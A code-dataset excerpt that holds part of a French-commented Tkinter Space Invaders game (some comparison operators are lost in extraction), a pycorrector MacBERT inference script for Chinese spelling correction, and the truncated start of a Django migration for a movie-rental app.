taille du projectile\n self.color= \"red\" #gestion de la couleur \n self.speed= 8 #gestion de la vitesse \n self.animspeed=50\n \n self.y=580 #initialisation de la coordonée y de départ \n self.stop=0 #initialisation d'une variable pour \"détruire\" le projectile \n self.defender=shooter #appel de l'objet defender déja créé dans cette class\n self.shooter=self.defender.get_id() #récupération de l'id de çe dernier\n Bullet.destru=False\n def install_in(self,canvas):\n self.canvas=canvas #récupération du canvas \n self.x=canvas.coords(self.shooter)[0] #récuperation des coordonées en x du defender plus 20 pour avoir son milieu \n self.id_tir=canvas.create_oval(self.x-self.radius,self.y+self.radius,self.x+self.radius,self.y-self.radius,width=0,fill=self.color) #création du projectile et stockage de son id dans une variable\n \n self.move_in() #appel de la fonction de déplacement\n def get_tir(self):\n return self.id_tir \n def set_stop(self): #cette methode est appeler plus bas dans le code\n self.stop=1 \n def set_destru(self):\n Bullet.destru=True\n \n\n\n def move_in(self):\n if Bullet.destru==True:\n self.destruction()\n return 0\n self.canvas.move(self.id_tir,0,-self.speed)\n if self.canvas.coords(self.id_tir)[1]>0 and self.stop==False: #si la coordonée en y du projectile est supérieur a 0 et que stop est a 0 (False) alors on rapelle la methode\n \n self.canvas.after(self.animspeed,self.move_in) #appel d'une methode après un temps donnée \n else:\n\n if self.canvas.coords(self.id_tir)[1]<=0:\n self.defender.point =self.defender.point-10 #ici on gère le score : si le projectile est détruit et que ses coordonnées sont suppérieur au cadre alors on enlève 10 points\n self.defender.game.class_score.change_score()\n \n self.destruction()\n #print(\"detruit\") #test pour vérifier le mon fonctionnement \n def destruction(self):\n self.defender.get_bullet().remove(self) #suppression de l'objet dans la liste de l'objet defender \n self.canvas.delete(self.id_tir) #suppression du canvas \n \n \nclass Bullet_alien(object):\n destru=False\n\n def __init__(self,alien,Fleet):\n self.radius = 5 #gestion de la taille du projectile\n self.color= \"green\" #gestion de la couleur \n self.speed= 8 #gestion de la vitesse \n self.animspeed=50\n self.alien=alien\n self.fleet=Fleet\n self.max_alien_bullet=4\n self.bunker_ici=False\n self.stop=0 #initialisation d'une variable pour \"détruire\" le projectile \n Bullet_alien.destru=False\n def install_in(self,canvas):\n if self.fleet.game.activ_bunker.get()==1:\n self.bunker_ici=True\n self.canvas=canvas #récupération du canvas \n self.x=canvas.coords(self.alien.get_alien_id())[0]+10 #récuperation des coordonées en x d'un alien plus 10 pour avoir son milieu \n self.y=canvas.coords(self.alien.get_alien_id())[1]+10 #récuperation des coordonées en y d'un alien plus 10 pour avoir son milieu \n self.id_tir=canvas.create_oval(self.x-self.radius,self.y+self.radius,self.x+self.radius,self.y-self.radius,width=0,fill=self.color) #création du projectile et stockage de son id dans une variable\n self.explosion=self.fleet.game.explosion\n \n self.move_in()\n\n def move_in(self):\n if Bullet_alien.destru==False:\n\n \n self.canvas.move(self.id_tir,0,+self.speed)\n \n try:\n\n if self.canvas.coords(self.id_tir)[1]0:\n\n if self.canvas.coords(self.id_tir)[0]>self.canvas.bbox(self.fleet.bunker_list[i].aff)[0]-10 and self.canvas.coords(self.id_tir)[3]>=self.canvas.bbox(self.fleet.bunker_list[i].aff)[1] and self.canvas.coords(self.id_tir)[2]self.canvas.bbox(self.fleet.defender.get_id())[0]-10 and self.canvas.coords(self.id_tir)[3]>=self.canvas.bbox(self.fleet.defender.get_id())[1] and self.canvas.coords(self.id_tir)[2]=1: #tant qu'il y a des aliens en vie alors on execute les boucles suivantes\n i=0\n if self.active==False: #si false alors ni victoire ni défaite alors on continue le deplacement des aliens\n #print(self.fleet_size) \n \n while i < len(self.aliens_fleet):#cette boucle a pour but de déplacer les aliens sur l'axe horizontale\n \n if self.aliens_fleet[i].get_alive()==True: #test si les aliens sont vivant\n '''\n La partie de code qui suit a pour but de tester si l'utilisateur a activer les bunker \n si oui on vérifie si il en reste un qui n'a pas été detruit par les tir aliens\n si oui on regarde si un des alien encore vivant et sur la même hauteur que les bunker \n si oui le joueur a perdu\n\n\n '''\n\n\n\n\n\n if self.game.activ_bunker.get()==1:\n if self.Nb_bunker_actif>=1:\n\n #print(self.Nb_bunker_actif)\n if self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[3] >= self.bunker_list[0].y2-20:\n\n self.active=True\n\n self.destruction()\n\n self.game.perdu()#appel de la methode qui affiche l'ecrant de defaite \n return 0\n \n\n\n\n if self.canvas.coords(self.aliens_fleet[i].get_alien_id())[1] > self.canvas.bbox(self.defender.get_id())[1]-5:#test si la coordonée y1 d'un alien vivant rentre en colision avec la coordonée en y du haut du defender\n \n if self.active==False:#destruction des aliens\n self.active=True\n\n self.destruction()\n\n self.game.perdu()#appel de la methode qui affiche l'ecrant de defaite \n return 0\n self.aliens_fleet[i].move_in(self.alien_x_delta,0)#deplace tout les aliens \n i+=1\n i=0\n while i < len(self.aliens_fleet): #toute cette boucle a pour but de tester si les alien vivant touchent le bord de l'écrant et de faire l'action appropriée\n\n j=0\n '''\n La partie de code qui suit a pour but de tester si un alien encore en vie touche le bord de l'écran si oui \n on inverse leur sens de déplacenment sur l'axe horizontal \n et on déplace tout les aliens une fois vers le bas\n\n\n '''\n\n\n\n if self.aliens_fleet[i].get_alive()==True:\n if self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[2] > self.largeur or self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[0] < 0:\n self.alien_x_delta = -self.alien_x_delta\n #i=len(self.aliens_fleet) #petite astuce me permettant de de ne déplacer qu'une fois vers le bas\n while j < len(self.aliens_fleet):\n self.aliens_fleet[j].move_in(self.alien_x_delta,self.alien_y_delta)\n j+=1\n i+=1\n if self.fleet_size<5: #augmentation de la vitesse si il reste moins de aliens en vie\n self.fleet_speed=25 \n\n self.canvas.after(self.fleet_speed,self.move_it) #rappel de ma fonction\n else:\n\n k=0\n while k < len(self.aliens_fleet):\n self.aliens_fleet[k].destruction()\n k+=1\n\n\n\n if self.active==False:\n self.active=True\n if self.signal==True:\n \n self.game.titre()\n else:\n self.game.Winn()#appel de la methode qui affiche l'ecrant de victoire \n\n def feu(self):\n if len(self.fired_bullets_alien) < self.max_fired_alien_bullet and self.active==False: #si la taille de la liste est inférieur a la valleur du nombre max de projectiles que l'on peut tirer alors:\n j=random.choice(self.aliens_fleet_bis)\n self.bullet_alien=Bullet_alien(j,self) #création d'un nouvel objet bullet : (c'est un projectile)\n self.bullet_alien.install_in(self.canvas) #on apelle la methode qui premetteras de desiner un projectile\n j.Animation.tir()\n self.fired_bullets_alien.append(self.bullet_alien) #on stocke l'objet dans la liste \n if self.active==False:\n\n self.canvas.after(self.fire_Alien_speed,self.feu)\n\n def Anime_les(self):\n if self.active==False:\n i=len(self.aliens_fleet_bis)\n i-=1\n alien=self.aliens_fleet_bis[random.randint(0,i)]\n if alien.anime==False:\n\n alien.anime_moi()\n self.canvas.after(500,self.Anime_les)\n \n def fin(self):\n self.signal=True\n try:\n \n self.bullet_alien.set_destru()\n except:\n None\n self.supr_bunker()\n self.alien.change()\n def supr_bunker(self):\n if self.game.activ_bunker.get()==1:\n\n for i in range(len(self.bunker_list)):\n self.bunker_list[i].suppr()\n def nb_bunker_actif(self):\n self.Nb_bunker_actif-=1\n\n \n def get_fleet(self):\n return self.aliens_fleet\n def destruction(self):\n\n k=0\n while k < len(self.aliens_fleet):\n self.aliens_fleet[k].destruction()\n k+=1\n self.canvas.delete(self.aliens_fleet) \n \n\nclass Alien(object):\n destru=False\n \n def __init__(self,Defender):\n self.defender=Defender\n self.alive = True\n self.anime=False\n \n\n def install_in(self,x,y,Canvas,Fleet):\n self.canvas=Canvas\n self.image = PhotoImage(file='alien.png').zoom(1).subsample(2)#appel de l'imege et permet de redefinir ça taille ici elle est moitié plus petite\n self.multiplicateur_bonus=1\n self.fleet=Fleet\n self.alien_id=self.canvas.create_image(x, y, image=self.image)#affichage de l'image pour des coordonnées x et y données\n Alien.destru=False\n self.Animation=AnimAlien(self)\n def anime_moi(self):\n #print(\"ici\")\n self.Animation.start()\n self.anime=True\n def non_anime(self):\n self.anime=False\n\n\n\n\n def touched_by(self,canvas): #dans cette methode on va gerer les conditions de mort d'un alien et ses conséquences\n\n #print(self.overlapped)\n \n for i in range(len(self.defender.get_bullet())):\n \n if self.alive == True:\n \n #print(self.overlapped)\n self.liste=self.defender.get_bullet()#ici on récupère la liste des projectiles qui sont actuellement a l'écrant\n \n\n\n for j in range(len(self.overlapped)):\n\n\n\n\n if self.overlapped[j]==self.liste[i].get_tir():# on sait que l'element 0 de la liste c'est forcément l'id de l'alien (Cf code ci-dessous) l'element en position 1 est un element qui rentre en colision avec l'alien on vérifie donc si cette element est présent dans la liste\n #print(\"oui \")\n self.defender.point+=self.defender.point_en_plus*self.multiplicateur_bonus\n self.liste[i].set_stop() #on apelle une méthode de la class bullet\n self.kill_alien(canvas)\n self.fleet.game.class_score.change_score()\n return 0\n #self.fleet.get_fleet().remove(self)\n #self.canvas.delete(self.alien_id)\n else:\n None\n def kill_alien(self,canvas):\n self.fleet.fleet_size-=1\n \n self.image1 = PhotoImage(file='explosion.gif').zoom(1).subsample(2) #ici on change l'image \n self.canvas.itemconfigure(self.alien_id, image=self.image1)\n \n self.alive = False \n self.canvas.after(150,self.mort)\n\n def destruction(self):\n #print(\"je suis detruit\")\n self.canvas.delete(self.alien_id)\n \n def get_bullet(self):\n return self.fleet.fired_bullets_alien\n\n def mort(self):\n\n \n self.image1 = PhotoImage(file='test.png').zoom(1).subsample(2) \n self.canvas.itemconfigure(self.alien_id, image=self.image1)\n if Alien.destru == True:\n self.destruction()\n else:\n self.fleet.aliens_fleet_bis.remove(self)\n\n \n \n def get_def_id(self):\n return self.defender.get_id()\n def get_alien_id(self):\n return self.alien_id\n def get_alive(self):\n return self.alive\n def change(self):\n #print(\"change alien\")\n Alien.destru=True\n \n\n def move_in(self,dx,dy):\n if Alien.destru==True:\n self.kill_alien(self.canvas)\n \n self.x=dx\n self.y=dy\n self.canvas.move(self.alien_id,self.x,self.y)\n x1,y1,x2,y2 = self.canvas.bbox(self.alien_id)\n self.overlapped = self.canvas.find_overlapping(x1, y1, x2, y2)#on reherche tout les objets qui rentrent en colision dans une zone définie ici se sont les coordonnées entière de l'alien\n if len(self.overlapped)>1:\n self.touched_by(self.canvas)\n\nclass AnimAlien(object):\n def __init__(self,alien):\n self.imageA = PhotoImage(file='alien.png').zoom(1).subsample(2)\n self.imageB = PhotoImage(file='alien1_bis.png').zoom(1).subsample(2)\n self.imageC = PhotoImage(file='alien_charge.png').zoom(1).subsample(2)\n self.imageD = PhotoImage(file='alien_tir.png').zoom(1).subsample(2)\n self.alien=alien\n self.canvas=alien.canvas\n self.alien_id=alien.alien_id\n self.etat=0\n self.etat_tir=0\n def start(self):\n \n if self.alien.get_alive()==True:\n if self.etat==0:\n self.etat=1\n #print(\"la\")\n self.canvas.itemconfigure(self.alien_id, image=self.imageB)\n if self.etat_tir==0:\n\n self.canvas.after(600,self.end)\n\n \n def end(self):\n if self.alien.get_alive()==True:\n self.alien.multiplicateur_bonus=1\n self.etat=0\n self.etat_tir=0\n self.alien.non_anime()\n self.canvas.itemconfigure(self.alien_id, image=self.imageA)\n \n\n def tir(self):\n if self.etat_tir==0:\n\n self.etat=1\n self.etat_tir=1\n self.alien.multiplicateur_bonus=2\n self.canvas.itemconfigure(self.alien_id, image=self.imageD)\n self.canvas.after(300,self.tirB)\n def tirB(self):\n if self.alien.get_alive()==True:\n self.canvas.itemconfigure(self.alien_id, image=self.imageC)\n self.canvas.after(300,self.end)\n\n\n\nclass Bunker(object):\n def __init__(self,game,i):\n self.game=game\n self.largeur=game.width\n self.hauteur=game.height\n self.width = 80 #gestion de la largeur du bunker\n self.height = 20 #gestion de la hauteur\n self.i=i\n self.Nb_bunker = 2\n self.espacement=300\n self.canvas=game.canvas\n self.y2=self.hauteur/1.2 + self.height\n self.install_in()\n def install_in(self):\n self.etat=3\n \n \n \n self.aff=self.canvas.create_rectangle(self.largeur/6 +self.espacement*self.i, self.hauteur/1.2, self.largeur/6 + self.width +self.espacement*self.i, self.y2, fill=\"green\")\n \n def touched(self):\n self.etat-=1\n self.change_etat()\n def change_etat(self):\n if self.etat==2:\n\n self.canvas.itemconfigure(self.aff,fill=\"orange\")\n if self.etat==1:\n\n self.canvas.itemconfigure(self.aff,fill=\"red\")\n if self.etat==0:\n self.canvas.delete(self.aff)\n self.game.fleet.nb_bunker_actif()\n def suppr(self):\n self.canvas.delete(self.aff)\n\n def get_etat(self):\n return self.etat\n\n \n\n \nclass Score:\n def __init__(self, nom,points):\n self.nom=nom\n self.points=points\n def get_score(self):\n return self.points\n def __str__(self):\n return \"Le Joueur du nom de : \" + self.nom + \" a fait : \"+ str(self.points) \n\n\nclass Resultat(object):\n def __init__(self):\n self.lesScores=[]\n def ajout(self,score):\n position=0\n try:\n\n for i in range(len(self.lesScores)):\n if int(self.lesScores[i].get_score()) >= score.get_score():\n position = i+1\n\n self.lesScores.insert(position, score)\n #print(\"bla bla bla\")\n #print(position)\n except:\n self.lesScores.insert(1,score)\n \n\n def __str__(self):\n chaine=str()\n for e in self.lesScores:\n chaine=chaine + \"\\n\" + str(e)\n return chaine\n def suppr(self):\n del self.lesScores[:]\n\n def fromFile(cls,fich):\n f = open(fich,\"r\")\n\n tmp = json.load(f)\n\n liste = []\n\n for d in tmp:\n l=Score(d[\"nom\"],d[\"scores\"])\n\n liste.append(l)\n result=Resultat()\n result.lesScores= liste\n f.close()\n return result\n\n def toFile(self,fich):\n f = open(fich,\"w\")\n tmp = []\n for l in self.lesScores:\n\n d = {}\n d[\"nom\"]= l.nom\n d[\"scores\"]= l.points\n tmp.append(d)\n json.dump(tmp,f)\n f.close()\n\n\nclass Game(object):\n \n def __init__(self, frame):\n self.width=1000 #X largeur\n self.height=600 #Y hauteur \n self.frame=frame\n self.back_ground = PhotoImage(file='Espace_invader.png')\n self.canvas=tk.Canvas(self.frame,width=self.width, height=self.height,bg=\"black\")\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\n self.canvas.create_image(0,0,anchor=NW,image=self.back_ground)\n self.defender=Defender(self)\n self.fleet=Fleet(self.width,self.height,self)\n self.nb=0\n self.actif= False\n self.defaite=False\n self.defender_present=False\n self.diff_var = IntVar()\n self.activ_bunker = IntVar()\n self.class_score=Score_aff(self.defender,self.canvas,self)\n self.resultat=Resultat()\n self.pseudo= StringVar() #permet de récuperer le texte de Entry\n self.explosion=Explosion(self)\n self.joueur_score=self.resultat\n self.posX_Boutton=self.width/1.1\n self.posY_Boutton=self.height/2\n self.lecture=False\n def start(self):\n\n self.titre()\n \n self.frame.winfo_toplevel().bind(\"\", self.keypress)\n \n def titre(self):\n try:\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_score_w)\n self.boutton_reset_score.destroy()\n self.canvas.delete(self.boutton_reset_score_w)\n\n self.canvas.delete(self.label_gg)\n \n except:\n None\n if self.lecture==False:\n self.lecture=True\n self.musique_explo = PlaySound(\"Accueil.wav\", SND_FILENAME | SND_ASYNC)\n 'création de multiple objet et intégration dans la fenettre'\n self.boutton_score=Button(self.canvas,text=\"Score\",font=(\"Arial\", 20),bg=\"red\",fg=\"blue\", command=self.score) #création d'un boutton\n self.boutton_score_w=self.canvas.create_window(self.width/2,self.height/1.05, window=self.boutton_score) #mise du boutton a l'intérieur de notre canvas \n self.Label_Titre=self.canvas.create_text(self.width/2,self.height/4,text=\"Space Invader\", font=(\"Arial\", 30),fill=\"red\", )\n \n\n self.boutton_debut=Button(self.canvas,text=\"Jouer\",font=(\"Arial\", 40),bg=\"red\",fg=\"blue\", command=self.lancement)\n self.boutton_debut_w=self.canvas.create_window(self.width/2,self.height/2, window=self.boutton_debut)\n self.label_Consigne=self.canvas.create_text(self.width/8,self.height/20,text=\"Entrez un pseudo\", font=(\"Arial\", 20),fill=\"red\", )\n self.ecrire=Entry(self.canvas,font=\"Arial\",textvariable=self.pseudo,fg=\"black\")\n self.ecrire_w=self.canvas.create_window(self.width/8,self.height/8, window=self.ecrire)\n \n self.R1 = Radiobutton(self.canvas, text=\"Facile\", variable=self.diff_var,bg=\"green\", value=1000)\n self.R2 = Radiobutton(self.canvas, text=\"Normal\", variable=self.diff_var,bg=\"orange\", value=666) \n self.R3 = Radiobutton(self.canvas, text=\"Difficile\", variable=self.diff_var,bg=\"red\", value=333)\n self.R1_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton-50, window=self.R1)\n self.R2_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton, window=self.R2)\n self.R3_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton+50, window=self.R3)\n self.diff_var.set(1000)\n self.label_bunker=self.canvas.create_text(self.posX_Boutton-800,self.posY_Boutton-100,text=\"Présence de bunker ?\", font=(\"Arial\", 15),fill=\"red\", )\n self.RChoix1 = Radiobutton(self.canvas, text=\"Oui\", variable=self.activ_bunker,bg=\"green\", value=1)\n self.RChoix2 = Radiobutton(self.canvas, text=\"Non\", variable=self.activ_bunker,bg=\"red\", value=0)\n self.RChoix1_w = self.canvas.create_window(self.posX_Boutton-800,self.posY_Boutton-50, window=self.RChoix1)\n self.RChoix2_w = self.canvas.create_window(self.posX_Boutton-800,self.posY_Boutton, window=self.RChoix2)\n self.activ_bunker.set(1)\n \n def lancement(self):\n if not self.pseudo.get():\n self.pseudo.set(\"invité\")#modifie la valleur du entry\n '''Supression de tout les elements du menu'''\n self.R1.destroy()\n self.R2.destroy()\n self.R3.destroy()\n self.canvas.delete(self.R1_w)\n self.canvas.delete(self.R2_w)\n self.canvas.delete(self.R3_w)\n self.RChoix1.destroy()\n self.RChoix2.destroy()\n self.canvas.delete(self.RChoix1_w)\n self.canvas.delete(self.RChoix2_w)\n self.ecrire.destroy()\n self.canvas.delete(self.Label_Titre)\n self.canvas.delete(self.label_bunker)\n self.canvas.delete(self.boutton_debut_w)\n self.boutton_debut.destroy()\n self.lecture=False\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_score_w)\n self.boutton_quit=Button(self.canvas,text=\"Quitter\",font=(\"Arial\", 10),bg=\"red\",fg=\"blue\", command=self.quit)\n self.boutton_quit_w=self.canvas.create_window(self.width/30,self.height/30, window=self.boutton_quit)\n self.canvas.delete(self.label_Consigne)\n self.actif=True\n self.musique_explo = PlaySound(\"vitup.wav\", SND_FILENAME | SND_ASYNC)\n self.defender.install_in(self.canvas)\n self.fleet.install_in(self.canvas,self.defender)\n self.class_score.install_in()\n self.defender_present=True\n \n\n def quit(self):\n self.actif=False\n self.fleet.fin()\n self.canvas.after(50,self.quit_action)\n\n def score(self):\n #print(\"ici\")\n try:\n \n self.joueur_score=self.resultat.fromFile(\"resultat.json\")\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=self.joueur_score, font=(\"Arial\", 20),fill=\"red\", )\n #print(self.joueur_score)\n except:\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Aucun score d'enregistré\", font=(\"Arial\", 20),fill=\"red\", )\n self.R1.destroy()\n self.R2.destroy()\n self.R3.destroy()\n self.canvas.delete(self.R1_w)\n self.canvas.delete(self.R2_w)\n self.canvas.delete(self.R3_w)\n self.RChoix1.destroy()\n self.RChoix2.destroy()\n self.canvas.delete(self.RChoix1_w)\n self.canvas.delete(self.RChoix2_w)\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_debut_w)\n self.canvas.delete(self.Label_Titre)\n self.canvas.delete(self.label_bunker)\n self.boutton_debut.destroy()\n self.boutton_score=Button(self.canvas,text=\"Retour\",font=(\"Arial\", 20),bg=\"red\",fg=\"blue\", command=self.titre)\n self.boutton_score_w=self.canvas.create_window(self.width/2,self.height/1.05, window=self.boutton_score)\n self.boutton_reset_score=Button(self.canvas,text=\"Réinitialiser les scores\",font=(\"Arial\", 10),bg=\"red\",fg=\"blue\", command=self.suppr_score)\n self.boutton_reset_score_w=self.canvas.create_window(self.width/2+200,self.height/1.05, window=self.boutton_reset_score)\n self.ecrire.destroy()\n self.canvas.delete(self.label_Consigne)\n \n \n def suppr_score(self):\n try:\n\n os.remove(\"resultat.json\")\n self.canvas.delete(self.label_gg)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Scores supprimés\", font=(\"Arial\", 20),fill=\"red\", )\n self.joueur_score.suppr()\n\n except:\n self.canvas.delete(self.label_gg)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Il n'y a aucun score a effacer\", font=(\"Arial\", 20),fill=\"red\", )\n\n\n def keypress(self, event):\n x = 0\n\n \n \n if event.keysym == 'Left': \n if self.defender_present==True:\n\n x = -30\n self.defender.move_in(self.canvas, x)\n elif event.keysym == 'Right': \n if self.defender_present==True:\n\n x = 30\n self.defender.move_in(self.canvas, x)\n \n if event.keysym == 'space': \n \n if self.defender_present==True:#permet d'éviter des erreurs lorsque le defender nest pas initialisé\n\n self.defender.fire(self.canvas)\n\n\n def quit_action(self):\n try:\n \n self.boutton_quit.destroy()\n except:\n None\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n if self.defaite==True:#si on est déja sur l'écran de defaite on le rapelle afin de supprimer ses éléments et de retourner a l'écran titre \n self.perdu()\n def start_animation(self):\n\n self.start()\n def Winn(self):\n self.fleet.supr_bunker()\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n self.win = PhotoImage(file='Victoire.gif').zoom(2)\n self.carrey=self.canvas.create_image(self.width/2, self.height/2, image=self.win)\n self.label_gg=self.canvas.create_text(self.width/2,self.height/2,text=\"Victoire\", font=(\"Arial\", 40),fill=\"red\", )\n self.label_score=self.canvas.create_text(self.width/2.5,self.height/4,text=\"Le score de \"+str(self.pseudo.get())+\" est de :\"+str(self.defender.point)+\" points\", font=(\"Arial\", 25),fill=\"green\", )\n #print(self.defender.point)\n self.musique_game_over = PlaySound(\"Bravo.wav\", SND_FILENAME | SND_ASYNC)\n try:\n \n self.joueur_score=self.resultat.fromFile(\"resultat.json\")\n #print(\"les calculs ne sont pas bon kevin\")\n except:\n None\n self.joueur_score.ajout(Score(self.pseudo.get(),self.defender.point))\n self.joueur_score.toFile(\"resultat.json\")\n \n self.Winn_play()\n \n def Winn_play(self):\n if self.nb==12:\n self.nb=0\n if self.actif== True:\n\n \n img_nb = \"gif -index \" + str(self.nb) #recupere le numéro d'une image du gif de l'explosion\n self.nb+=1\n self.win = PhotoImage(file = 'Victoire.gif', format = img_nb) #recupere l'image de l'explosion\n self.canvas.itemconfigure(self.carrey, image=self.win)\n self.canvas.after(50,self.Winn_play)\n else:\n self.canvas.delete(self.label_score)\n self.canvas.delete(self.win)\n self.canvas.delete(self.carrey)\n self.canvas.delete(self.label_gg)\n self.titre()\n \n def perdu(self):\n \n if self.actif== True:\n self.fleet.supr_bunker()\n if self.defender_present==True:\n self.defender_present=False\n self.defender.destruction(self.canvas)\n self.musique_game_over = PlaySound(\"gameover.wav\", SND_FILENAME | SND_ASYNC)\n #print(\"on passe par ici\")\n self.defaite= True\n self.loose = PhotoImage(file='Tnul.png').zoom(1).subsample(2)\n self.nul=self.canvas.create_image(200, 200, image=self.loose)\n self.label_perdu=self.canvas.create_text(self.width/2,self.height/2,text=\"Perdu !\", font=(\"Arial\", 40),fill=\"red\", )\n self.label_retour=self.canvas.create_text(self.width/2,self.height/4,text=\"Essaye encore\", font=(\"Arial\", 40),fill=\"red\", )\n \n \n else:\n #print(\"on passe par la\")\n self.defaite= False\n self.canvas.delete(self.label_perdu)\n self.canvas.delete(self.label_retour)\n self.canvas.delete(self.loose)\n self.canvas.delete(self.nul)\n\n self.titre() \n\n \nclass SpaceInvaders(object): \n ''' Main Game class '''\n\n def __init__(self): \n self.root = tk.Tk()\n self.root.title(\"Space Invaders\")\n width=800\n height=600\n self.frame=tk.Frame(self.root,width=width, height=height,bg=\"green\")\n self.frame.pack()\n self.game = Game(self.frame)\n \n def play(self): \n self.game.start_animation()\n self.root.mainloop() \n \njeu=SpaceInvaders()\njeu.play()","sub_path":"PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":40104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398285964","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com), Abtion(abtion@outlook.com)\n@description: \n\"\"\"\nimport sys\nimport operator\nimport torch\nfrom transformers import BertTokenizer\n\nsys.path.append('../..')\n\nfrom pycorrector.macbert.macbert4csc import MacBert4Csc\nfrom pycorrector.macbert.softmaskedbert4csc import SoftMaskedBert4Csc\nfrom pycorrector.macbert.defaults import _C as cfg\nfrom pycorrector.utils.logger import logger\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass Inference:\n def __init__(self, ckpt_path='output/macbert4csc/epoch=09-val_loss=0.01.ckpt',\n vocab_path='output/macbert4csc/vocab.txt',\n cfg_path='train_macbert4csc.yml'):\n logger.debug(\"device: {}\".format(device))\n self.tokenizer = BertTokenizer.from_pretrained(vocab_path)\n cfg.merge_from_file(cfg_path)\n if 'macbert4csc' in cfg_path:\n self.model = MacBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,\n cfg=cfg,\n map_location=device,\n tokenizer=self.tokenizer)\n elif 'softmaskedbert4csc' in cfg_path:\n self.model = SoftMaskedBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,\n cfg=cfg,\n map_location=device,\n tokenizer=self.tokenizer)\n else:\n raise ValueError(\"model not found.\")\n\n self.model.eval()\n self.model.to(device)\n logger.debug(\"device: {}\".format(device))\n\n def predict(self, sentence_list):\n \"\"\"\n 文本纠错模型预测\n Args:\n sentence_list: list\n 输入文本列表\n Returns: tuple\n corrected_texts(list)\n \"\"\"\n is_str = False\n if isinstance(sentence_list, str):\n is_str = True\n sentence_list = [sentence_list]\n corrected_texts = self.model.predict(sentence_list)\n if is_str:\n return corrected_texts[0]\n return corrected_texts\n\n def predict_with_error_detail(self, sentence_list):\n \"\"\"\n 文本纠错模型预测,结果带错误位置信息\n Args:\n sentence_list: list\n 输入文本列表\n Returns: tuple\n corrected_texts(list), details(list)\n \"\"\"\n details = []\n is_str = False\n if isinstance(sentence_list, str):\n is_str = True\n sentence_list = [sentence_list]\n corrected_texts = self.model.predict(sentence_list)\n\n def get_errors(corrected_text, origin_text):\n sub_details = []\n for i, ori_char in enumerate(origin_text):\n if ori_char in [' ', '“', '”', '‘', '’', '琊', '\\n', '…', '—', '擤']:\n # add unk word\n corrected_text = corrected_text[:i] + ori_char + corrected_text[i:]\n continue\n if i >= len(corrected_text):\n continue\n if ori_char != corrected_text[i]:\n if ori_char.lower() == corrected_text[i]:\n # pass english upper char\n corrected_text = corrected_text[:i] + ori_char + corrected_text[i + 1:]\n continue\n sub_details.append((ori_char, corrected_text[i], i, i + 1))\n sub_details = sorted(sub_details, key=operator.itemgetter(2))\n return corrected_text, sub_details\n\n for corrected_text, text in zip(corrected_texts, sentence_list):\n corrected_text, sub_details = get_errors(corrected_text, text)\n details.append(sub_details)\n if is_str:\n return corrected_texts[0], details[0]\n return corrected_texts, details\n\n\nif __name__ == \"__main__\":\n ckpt_path = sys.argv[1]\n vocab_path = sys.argv[2]\n cfg_path = sys.argv[3]\n m = Inference(ckpt_path,\n vocab_path,\n cfg_path)\n inputs = [\n '它的本领是呼风唤雨,因此能灭火防灾。狎鱼后面是獬豸。獬豸通常头上长着独角,有时又被称为独角羊。它很聪彗,而且明辨是非,象征着大公无私,又能镇压斜恶。',\n '老是较书。',\n '感谢等五分以后,碰到一位很棒的奴生跟我可聊。',\n '遇到一位很棒的奴生跟我聊天。',\n '遇到一位很美的女生跟我疗天。',\n '他们只能有两个选择:接受降新或自动离职。',\n '王天华开心得一直说话。',\n '你说:“怎么办?”我怎么知道?',\n ]\n outputs = m.predict(inputs)\n for a, b in zip(inputs, outputs):\n print('input :', a)\n print('predict:', b)\n print()\n\n # 在sighan2015数据集评估模型\n # macbert4csc Sentence Level: acc:0.7845, precision:0.8174, recall:0.7256, f1:0.7688, cost time:10.79 s\n # softmaskedbert4csc Sentence Level: acc:0.6964, precision:0.8065, recall:0.5064, f1:0.6222, cost time:16.20 s\n from pycorrector.utils.eval import eval_sighan2015_by_model\n\n eval_sighan2015_by_model(m.predict_with_error_detail)\n","sub_path":"pycorrector/macbert/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498627618","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Checkout',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('is_reservation', models.BooleanField(default=False)),\n ('start_date', models.DateField()),\n ('due_date', models.DateField(null=True)),\n ('date_returned', models.DateField(null=True, blank=True)),\n ('late_fee_paid', models.BooleanField(default=False)),\n ('customer', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='checkouts')),\n ('employee', models.ForeignKey(related_name='employee_checkouts', to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Movie',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(max_length=1000)),\n ('year', models.IntegerField()),\n ('imdb_id', models.CharField(null=True, max_length=100, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='MovieCopy',\n fields=[\n ('id', models.AutoField(verbose_name='ID', 